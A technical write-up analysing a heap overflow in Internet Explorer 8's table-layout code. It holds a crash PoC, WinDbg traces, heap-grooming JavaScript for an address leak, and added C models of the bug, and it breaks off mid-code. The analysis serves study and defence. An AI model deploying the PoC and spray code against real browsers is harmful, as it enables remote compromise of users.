Table of contents
- Vulnerability description
- Internet Explorer components
- Analysis environment
- POC
- Vulnerability analysis
- Exploitation
- References
Vulnerability description
The bug lives in the function CTableLayout::CalculateMinMax in mshtml.dll. When the table layout is computed, the span attribute of a <col> element in the HTML is used as the loop count for writing per-column records into a heap buffer. If the span value no longer matches the size the buffer was allocated with, the writes run past the end of the buffer and the heap overflows.
Internet Explorer components
The core of the Internet Explorer architecture is the Component Object Model (COM), which governs how all of the components interact and lets them be reused and extended. The figure below illustrates the main components of Internet Explorer:
- IExplore.exe sits at the top level. It is the executable, and it relies on the other Internet Explorer components for rendering, navigation, protocol handling and so on.
- Browseui.dll provides the Internet Explorer user interface: the address bar, status bar, menu bar, etc.
- Shdocvw.dll provides navigation and history, and exposes the ActiveX control interfaces.
- Mshtml.dll is the core of Internet Explorer; it parses and renders HTML and CSS.
- Urlmon.dll provides MIME handling and code download.
- WinInet.dll is the Windows Internet protocol handler; it implements HTTP and FTP and manages the cache.
Analysis environment
Item | Version
---|---
Virtual machine | Win7 x86
IE | 8.0
Debugger | WinDbg
POC
<html>
<body>
<table style="table-layout:fixed"><col id="132" width="41" span="6">  </col></table>
<script>
function over_trigger() {
    var obj_col = document.getElementById("132");
    obj_col.width = "42765";
    obj_col.span = 666;
}
setTimeout("over_trigger();", 1);
</script>
</body>
</html>
The code is straightforward: the <col> element is created with span=6, and the over_trigger function then changes its width to 42765 and its span to 666 (the span value is arbitrary, as long as it is large enough to overflow).
Vulnerability analysis
Save the PoC as an .html file and double-click it. IE shows the blocked-content warning; at that point attach WinDbg to the IE process.
The attach list shows two IE processes; pick the second one, the child process that hosts the current tab. Then set the following breakpoints:
0:012> bp mshtml!CTableLayout::CalculateMinMax
0:012> bp mshtml!_HeapRealloc
0:012> bp mshtml!CTableCol::GetAAspan
The bug is in CTableLayout::CalculateMinMax, so that function obviously gets a breakpoint. Since this is a heap overflow, _HeapRealloc gets one as well. Finally, CTableCol::GetAAspan is the function that reads the span attribute.
0:012> bd 1 2
0:012> bl
0 e 6bcca078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 d 6bd7d7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 d 6bc4a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
Breakpoints 1 and 2 are disabled for now. Enter g to resume, allow the blocked content in IE, and click OK on the warning that pops up.
0:012> g
ModLoad: 6bb30000 6bbe2000 C:\Windows\System32\jscript.dll
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00412802 edx=ffffffff esi=00000000 edi=0245c334
eip=6891a078 esp=0245c0d8 ebp=0245c2f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff mov edi,edi
Back in WinDbg, execution stops for the first time at the entry of CTableLayout::CalculateMinMax. This is the pass that handles the initial span value of 6.
0:005> kb
ChildEBP RetAddr Args to Child
0245c0d4 6891a6b8 004899c0 0245c368 00000000 mshtml!CTableLayout::CalculateMinMax
0245c2f0 68910879 0245c368 0245c334 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245c49c 68a1566c 0245d3b8 0245c6c8 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0245c5d4 68a118f9 004899c0 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
......
Now look at the call stack and the declaration of CTableLayout::CalculateMinMax:
void __thiscall CTableLayout::CalculateMinMax(CTableLayout *theTableLayoutObj, LPVOID lpUnknownStackBuffer);
The variable of interest is CTableLayout *theTableLayoutObj, the this pointer; from the kb output above its value is 004899c0.
Examining the memory at 004899c0: 68819aa0 is the vftable pointer, 00000006 is the span value, and the rightmost 0 (the field at offset 0x9c, address 00489a5c) is the start address of the heap buffer, which is still NULL because nothing has been allocated yet.
0:005> be 1 2
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
Breakpoints 1 and 2 are now re-enabled.
0:005> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=000000a8 edx=00000000 esi=00489a5c edi=00489a50
eip=689cd7a5 esp=0245c00c ebp=0245c024 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!_HeapRealloc:
689cd7a5 8bff mov edi,edi
After g, execution stops at the entry of mshtml!_HeapRealloc.
The program allocates heap space to hold the per-column layout records. Each record is 0x1C bytes, and the number of records is determined by the span attribute.
Because span is 6 in the PoC, the requested size is 0x1C*6 = 0xA8, which is exactly the value in ecx when _HeapRealloc breaks.
0:005> gu
eax=00000000 ebx=00000000 ecx=775a5dd3 edx=004b6657 esi=00489a5c edi=00489a50
eip=689e34e2 esp=0245c014 ebp=0245c024 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CImplAry::EnsureSizeWorker+0xa1:
689e34e2 8bd8 mov ebx,eax
gu runs until _HeapRealloc returns. Once it has completed, look at the CTableLayout *theTableLayoutObj object again:
0:005> dd 004899c0 L30
004899c0 68819960 00464528 00439648 689ce3b8
004899d0 00000001 00000000 0108080d ffffffff
004899e0 00000000 00000000 00000000 ffffffff
004899f0 00017700 0000b478 00000000 00000000
00489a00 00000000 00412802 00000000 00000000
00489a10 00000000 00000006 00000000 ffffffff
00489a20 00000000 ffffffff 6881a594 00000004
00489a30 00000004 00475ed8 6881a594 00000018
00489a40 00000006 004a3660 00000000 00000000
00489a50 6881a594 00000000 00000000 004b6658
00489a60 00000000 00000000 00000000 00000000
00489a70 00000000 00000000 00000000 00000000
The heap buffer pointer at offset 0x9c (00489a5c) has changed from NULL to 004b6658.
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245c02c ebp=0245c0d4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff mov edi,edi
0:005> gu
eax=00000006 ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000 cmp eax,3E8h
Continuing, execution stops in CTableCol::GetAAspan, which fetches the span value that serves as the loop count when the records are written. The result is returned in eax; after gu, eax is 6.
0:005> ba w1 004b6658
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 e 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 3 hit
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245c014 ebp=0245c01c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a jmp mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)
Now watch the program write the records into the buffer: a write breakpoint is set on the buffer's start address, g is entered, and the breakpoint fires.
The width attribute in the PoC is 41, and what gets written at the buffer start 004b6658 is width*100 = 4100 = 0x1004, the value in ebx when the breakpoint hits. By the time it fires the whole 0x1C-byte record has already been written, so we single-step onward:
0:005> p
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a75 esp=0245c014 ebp=0245c01c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x5b:
68c40a75 5f pop edi
......
0:005>
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec inc dword ptr [ebp-14h] ss:0023:0245c0c0=00000000
0:005>
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec mov eax,dword ptr [ebp-14h] ss:0023:0245c0c0=00000001
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c add dword ptr [ebp-24h],1Ch ss:0023:0245c0b0=00000000
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0245c0e4=00000006
Here is an inc + cmp pair, which should be the loop that writes the records into the heap buffer.
These instructions increment [ebp-14h] by 1 on every iteration (the loop counter), advance [ebp-24h] by 0x1C (the size of one record), and finally compare the counter against [ebp+10h]:
0:005> dd [ebp+10h] L1
0245c0e4 00000006
[ebp+10h] is the span value. Next, look at what happens on the second entry into CTableLayout::CalculateMinMax, after the script has updated span to 666. In theory the buffer should be reallocated, since 660 more records have to be written, then the new span fetched as the loop count, and only then the records written.
Disable breakpoints 1 to 3, run to the second hit, and dump the object again; it also confirms that 6 records were written (the 00000006 at 00489a58, just before the buffer pointer 004b6658):
0:005> bd 1 2 3
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 d 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00402c02 edx=ffffffff esi=00000000 edi=0245bb4c
eip=6891a078 esp=0245b8f0 ebp=0245bb08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff mov edi,edi
0:005> kb L3
ChildEBP RetAddr Args to Child
0245b8ec 6891a6b8 004899c0 0245bb80 00000000 mshtml!CTableLayout::CalculateMinMax
0245bb08 68910879 0245bb80 0245bb4c 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245bcb4 68a1566c 0245d328 0245bee0 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0:005> dd 004899c0 L30
004899c0 68819960 00464528 00439648 689ce3b8
004899d0 00000001 00000000 010a081d 00002580
004899e0 00000000 00000000 0041da18 ffffffff
004899f0 00017700 0000b478 00000708 00000001
00489a00 00000000 00402c02 00000000 00000000
00489a10 00000000 00000006 ffffffff ffffffff
00489a20 ffffffff ffffffff 6881a594 00000004
00489a30 00000004 00475ed8 6881a594 00000018
00489a40 00000006 004a3660 00000000 00000000
00489a50 6881a594 00000018 00000006 004b6658
00489a60 00000000 00000000 00000000 00000000
00489a70 00000000 00000000 00000000 00000000
Next should come the heap allocation, so re-enable the _HeapRealloc and GetAAspan breakpoints and run with g:
0:005> be 1 2
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 d 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245b844 ebp=0245b8ec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff mov edi,edi
0:005> gu
eax=0000029a ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000 cmp eax,3E8h
But the program skips the allocation entirely: the _HeapRealloc breakpoint never fires. It wrongly assumes the previously allocated buffer is big enough and goes straight to fetching the span attribute as the loop count. When CTableCol::GetAAspan returns, eax is 0x29a, i.e. 666.
What follows is the same record-writing loop as before, except that 666 records are now written into a buffer that only holds 6, which overflows the heap.
0:005> be 3
0:005> bd 1 2
0:005> bl
0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
3 e 004b6658 w 1 0001 (0001)  0:****
0:005> g
Breakpoint 3 hit
eax=04141148 ebx=00414114 ecx=004b6670 edx=00004141 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245b82c ebp=0245b834 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a jmp mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)
The write breakpoint on the buffer is re-enabled so it fires on the first write, and from there we keep single-stepping. Note that ebx is now 00414114: the script changed width to 42765, and 42765*100 = 0x414114, so every record is now filled with that value (the bytes 14 41 41 00).
0:005>
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec inc dword ptr [ebp-14h] ss:0023:0245b8d8=00000000
0:005>
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec mov eax,dword ptr [ebp-14h] ss:0023:0245b8d8=00000001
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c add dword ptr [ebp-24h],1Ch ss:0023:0245b8c8=00000000
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0245b8fc=0000029a
Now check the value at ebp+10h:
0:005> dd ebp+10h L1
0245b8fc 0000029a
[ebp+10h] now holds the span value 0x29a, so the loop will run 666 times. Execution continues after the overflow until the corrupted heap causes an access violation and IE crashes.
Summary:
- The program allocates a heap buffer whose size is derived from the span attribute.
- It fetches the span attribute and, in a loop, writes one record per span into the buffer.
- The script then updates the span attribute.
- On the next layout pass the program skips the allocation, wrongly assuming the existing buffer is big enough, and goes straight to fetching the new span as the loop count.
- Writing the records overflows the heap buffer and crashes the browser.
Exploitation
To exploit a heap overflow you first have to decide what to overwrite and where. To bypass DEP and ASLR, VUPEN used the overflow to overwrite the length field of a BSTR, then read the CButtonLayout vtable pointer from JavaScript through the enlarged string, subtracted a fixed offset to obtain the base address of mshtml.dll, and built a ROP chain from it.
The first step is therefore to groom the heap so that the mshtml.dll base can be leaked. The following code sets up the heap layout:
<div id="test"></div>
<script language='javascript'>
var leak_index = -1;
var dap = "EEEE";
while (dap.length < 480) dap += dap;
var padding = "AAAA";
while (padding.length < 480) padding += padding;
var filler = "BBBB";
while (filler.length < 480) filler += filler;
// spray
var arr = new Array();
var rra = new Array();
var div_container = document.getElementById("test");
div_container.style.cssText = "display:none";
for (var i = 0; i < 500; i += 2) {
    // E
    rra[i] = dap.substring(0, (0x100 - 6) / 2);
    // S, bstr = A
    arr[i] = padding.substring(0, (0x100 - 6) / 2);
    // A, bstr = B
    arr[i + 1] = filler.substring(0, (0x100 - 6) / 2);
    // B
    var obj = document.createElement("button");
    div_container.appendChild(obj);
}
for (var i = 200; i < 500; i += 2) {
    rra[i] = null;
    CollectGarbage();
}
</script>
The JavaScript first builds the strings "EEEE…", "AAAA…" and "BBBB…" and takes a (0x100-6)/2 = 125-character substring of each, so that every resulting string occupies exactly 0x100 bytes; each loop iteration also creates a button element, i.e. a CButtonLayout object.
In IE these strings are BSTRs (Basic Strings): Unicode strings with a length prefix and a NUL terminator, so the character count is half the byte count, which is why the code divides by 2 (the 6 accounts for the 4-byte length prefix and the 2-byte terminator).
Then, starting from the middle of the rra array, every other "EEEE" string is released and the garbage collector run, leaving holes that later 0x100-byte allocations can occupy.
The resulting heap layout is shown below:
[Figure: heap layout after the spray (image not available)]
The holes exist so that the vulnerable buffer (vulheap) lands in one of them; when it overflows, it overwrites the "AAAA" and "BBBB" strings that follow.
<table style="table-layout:fixed" ><col id="0" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >  </col></table>
Next, a run of 132 such col elements is created to occupy the freed "EEEE" slots. With span="9", each column array is 9*0x1C = 0xFC bytes, so it is served from the same 0x100-byte size class as the freed strings.
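As an added illustration of both the span bug summarised in the analysis section and the BSTR-length leak described here, the following C program is a small model and is not mshtml code. It places four 0x100-byte chunks side by side without heap headers (the column record array, the "AAAA" and "BBBB" BSTRs, and a button object whose first dword is its vtable pointer), reduces each 0x1C-byte column record to three copies of width*100 followed by zeros (the 04 10 00 00 pattern in the dumps), and uses an assumed mshtml.dll base and vtable offset. The vulnerable path sizes the array only on the first pass; the fixed path grows it to span*0x1C before every write loop. A second pass with span=10 and width=42765 drops 0x414114 onto the length prefix of the "AAAA" string, which is enough to read the button's vtable through that string, while the fixed path leaves the string untouched.

```c
/* Added model of the span bug and the BSTR-length leak; not mshtml code.
 * Four adjacent 0x100-byte chunks, no heap headers (simplification):
 *   [0] column record array  [1] BSTR "AAA.."  [2] BSTR "BBB.."  [3] button object (vtable ptr first) */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define COLCALC_SIZE     0x1C               /* per-column record size seen in the debugger */
#define SLOT             0x100              /* size class the spray targets */
#define ARENA_BYTES      (4 * SLOT)
#define FAKE_MSHTML_BASE 0x68810000u        /* assumed; the real base is randomised by ASLR */
#define FAKE_VTABLE_RVA  0x000c8690u        /* assumed offset of CButtonLayout's vtable in mshtml.dll */

enum { VULHEAP = 0, BSTR_A = SLOT, BSTR_B = 2 * SLOT, BUTTON = 3 * SLOT };

typedef struct { uint8_t mem[ARENA_BYTES]; } arena_t;
typedef struct { uint8_t *calcs; size_t capacity; int owns; } layout_t;  /* calcs ~ [ebx+9c] */
typedef struct { size_t overflow; uint32_t bstr_len; uint32_t leaked_base; } result_t;

static void put32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static uint32_t get32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* BSTR: 4-byte byte length, UTF-16 chars, 2-byte terminator; 125 chars fill exactly 0x100 bytes. */
static void make_bstr(uint8_t *p, char c)
{
    put32(p, SLOT - 6);                                   /* 0xFA, the "fa 00 00 00" before B.B.B. in the dump */
    for (int i = 0; i < (SLOT - 6) / 2; i++) { p[4 + 2 * i] = (uint8_t)c; p[5 + 2 * i] = 0; }
    p[SLOT - 2] = p[SLOT - 1] = 0;
}

static void arena_init(arena_t *a)
{
    memset(a->mem, 0, sizeof a->mem);
    make_bstr(a->mem + BSTR_A, 'A');
    make_bstr(a->mem + BSTR_B, 'B');
    put32(a->mem + BUTTON, FAKE_MSHTML_BASE + FAKE_VTABLE_RVA);
}

/* One CalculateMinMax pass. Vulnerable: the array is sized from span on the first pass only, and a
 * later, larger span reuses it. Fixed: grow to span*0x1C before the loop. Returns the number of bytes
 * written past the array's capacity (the model stops at the arena end instead of faulting). */
static size_t calculate_minmax(layout_t *l, arena_t *a, int span, uint32_t width, int fixed)
{
    size_t need = (size_t)span * COLCALC_SIZE;
    if (l->calcs == NULL) {                                /* first pass: 6 * 0x1C = 0xA8 for the PoC */
        l->calcs = a->mem + VULHEAP; l->capacity = need; l->owns = 0;
    } else if (fixed && need > l->capacity) {              /* EnsureSize on every pass */
        uint8_t *p = calloc(1, need);
        if (!p) { perror("calloc"); exit(1); }
        memcpy(p, l->calcs, l->capacity);
        if (l->owns) free(l->calcs);
        l->calcs = p; l->capacity = need; l->owns = 1;
    }
    size_t limit = l->owns ? l->capacity : ARENA_BYTES - VULHEAP;
    size_t overflow = 0;
    for (int i = 0; i < span; i++) {                       /* inc [ebp-14h] ... cmp eax,[ebp+10h] */
        uint32_t rec[COLCALC_SIZE / 4] = { width * 100u, width * 100u, width * 100u, 0, 0, 0, 0 };
        size_t off = (size_t)i * COLCALC_SIZE;
        if (off + COLCALC_SIZE > l->capacity) overflow += COLCALC_SIZE;
        if (off + COLCALC_SIZE <= limit) memcpy(l->calcs + off, rec, COLCALC_SIZE);
    }
    return overflow;
}

/* The JavaScript side after the overflow: if the "A" BSTR's length prefix now claims more than 0xFA
 * bytes, charCodeAt() can read through the following chunks up to the button's vtable pointer. */
static uint32_t leak_vtable(const arena_t *a)
{
    uint32_t len = get32(a->mem + BSTR_A);
    if ((size_t)BSTR_A + 4 + len < BUTTON + 4) return 0;  /* length intact: the vtable is out of reach */
    return get32(a->mem + BUTTON);
}

/* Pass 1 with the PoC's span=6 / width=41, then pass 2 with the attributes the script set. */
static result_t run_scenario(int fixed, int span2, uint32_t width2)
{
    arena_t a; layout_t l = { NULL, 0, 0 }; result_t r;
    arena_init(&a);
    calculate_minmax(&l, &a, 6, 41, fixed);
    r.overflow = calculate_minmax(&l, &a, span2, width2, fixed);
    r.bstr_len = get32(a.mem + BSTR_A);
    uint32_t vt = leak_vtable(&a);
    r.leaked_base = vt ? vt - FAKE_VTABLE_RVA : 0;
    if (l.owns) free(l.calcs);
    return r;
}

int main(void)
{
    result_t v = run_scenario(0, 10, 42765), f = run_scenario(1, 10, 42765), c = run_scenario(0, 666, 42765);
    printf("vulnerable, span=10 : %zu bytes past the array, BSTR length 0x%x, leaked base 0x%08x\n",
           v.overflow, v.bstr_len, v.leaked_base);
    printf("fixed,      span=10 : %zu bytes past the array, BSTR length 0x%x, leaked base 0x%08x\n",
           f.overflow, f.bstr_len, f.leaked_base);
    printf("vulnerable, span=666: %zu bytes past the array (the PoC's crash case)\n", c.overflow);
    return 0;
}
```

Any C99 compiler builds it; main prints the three scenarios. Two things the model deliberately leaves out: the real exploit reads the enlarged string from JavaScript with charCodeAt(), and the real heap chunk headers shift which record field lands on the length prefix, which is why the exploit code picks its span and width empirically rather than by this arithmetic.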
To confirm that the allocated vulheap really occupies one of the freed "EEEE" slots, first set a breakpoint on the function that frees the memory, CollectGarbage, which corresponds to JsCollectGarbage in jscript.dll.
First launch IE under WinDbg:
0:012> .childdbg 1
Processes created by the current process will be debugged
.childdbg 1 enables child-process debugging, so the tab's child process is debugged as well.
0:012> sxe ld:jscript
Because jscript.dll is not loaded yet when IE starts, set the debugger to break when that module loads.
0:012> g
ModLoad: 6be10000 6bec2000 C:\Windows\System32\jscript.dll
eax=00000000 ebx=00000000 ecx=00000074 edx=004c0e94 esi=7ffd9000 edi=022ac19c
eip=775970b4 esp=022ac0b4 ebp=022ac108 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
775970b4 c3 ret
Enter g and allow the blocked content in IE; the debugger stops when jscript.dll is loaded.
0:005> bp jscript!JsCollectGarbage
Once it breaks, set a breakpoint on JsCollectGarbage. Every heap free eventually reaches the low-level function ntdll!RtlFreeHeap, whose third parameter is the address of the block being freed, so a breakpoint there can record and print every freed block address:
0:005> bd 0
0:005> bl
0 d 6be983d3     0001 (0001)  0:**** jscript!JsCollectGarbage
0:005> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
Before setting it, disable the JsCollectGarbage breakpoint so the debugger does not keep stopping there.
The vulheap buffer is allocated by CImplAry::EnsureSizeWorker, called from CTableLayout::CalculateMinMax, and the returned address is stored at [ebx+9c]. The instruction following that call is at mshtml!CTableLayout::CalculateMinMax+0x16d, so a breakpoint there prints the vulheap address:
0:005> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
Since this produces a lot of output, write it to a log file:
0:005> .logopen c:\log.txt
Opened log file 'c:\log.txt'
When recording is done, close it with .logclose:
0:005> .logclose
Closing open log file c:\log.txt
In the saved log, the last vulheap entry is the one we want:
free heap
083f2ef0 e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00 ..Vi..L..b..8.L.
free heap
00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
free heap
00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
free heap
00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
(3f4.c0): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=083f5d20 ecx=00000000 edx=00000009 esi=022ac580 edi=00000000
eip=694ba1b2 esp=020b3000 ebp=022ac2ec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CTableLayout::CalculateMinMax+0x175:
694ba1b2 50 push eax
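An added C helper, not part of the page, that performs the check the log is collected for: it gathers every non-NULL address printed after a "free heap" marker, keeps the address printed after the last "vulheap" marker, and reports whether that vulheap address is one of the freed blocks, i.e. whether the column array reused a slot the spray released. The embedded log is constructed for the example; only its line shapes follow the real WinDbg output above.

```c
/* Added helper, not from the page: check a WinDbg log written by the "free heap" and "vulheap"
 * breakpoints above. The embedded log is constructed; only its line shapes follow the real output. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FREED 512

typedef struct {
    uint32_t freed[MAX_FREED];   /* non-NULL block addresses passed to RtlFreeHeap */
    int      nfreed;
    uint32_t vulheap;            /* address printed after the last "vulheap" marker, 0 if none */
    int      nvulheap;
} groom_log_t;

/* Each marker line is followed by one db/dd line whose first token is the address. */
static void parse_groom_log(const char *log, groom_log_t *g)
{
    memset(g, 0, sizeof *g);
    int expect = 0;                               /* 1: freed address next, 2: vulheap address next */
    for (const char *p = log; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (expect) {
            uint32_t addr = (uint32_t)strtoul(p, NULL, 16);   /* "083f2ef0 e8 d2 ..." -> 0x083f2ef0 */
            if (expect == 1) { if (addr && g->nfreed < MAX_FREED) g->freed[g->nfreed++] = addr; }
            else             { g->vulheap = addr; g->nvulheap++; }
            expect = 0;
        } else if (strncmp(p, "free heap", 9) == 0) {
            expect = 1;
        } else if (strncmp(p, "vulheap", 7) == 0) {
            expect = 2;
        }
        p += len + (nl ? 1 : 0);
    }
}

/* The check the groom is meant to pass: the column array reused a chunk the spray released. */
static int vulheap_in_freed_slot(const groom_log_t *g)
{
    for (int i = 0; i < g->nfreed; i++)
        if (g->freed[i] == g->vulheap) return 1;
    return 0;
}

/* Constructed log: two real frees, one NULL free (RtlFreeHeap is also called with NULL, as in
 * the real log), and two vulheap hits, of which only the last one matters. */
static const char SAMPLE_LOG[] =
    "free heap\n"
    "083f2ef0 e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00 ..Vi..L..b..8.L.\n"
    "free heap\n"
    "00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????\n"
    "free heap\n"
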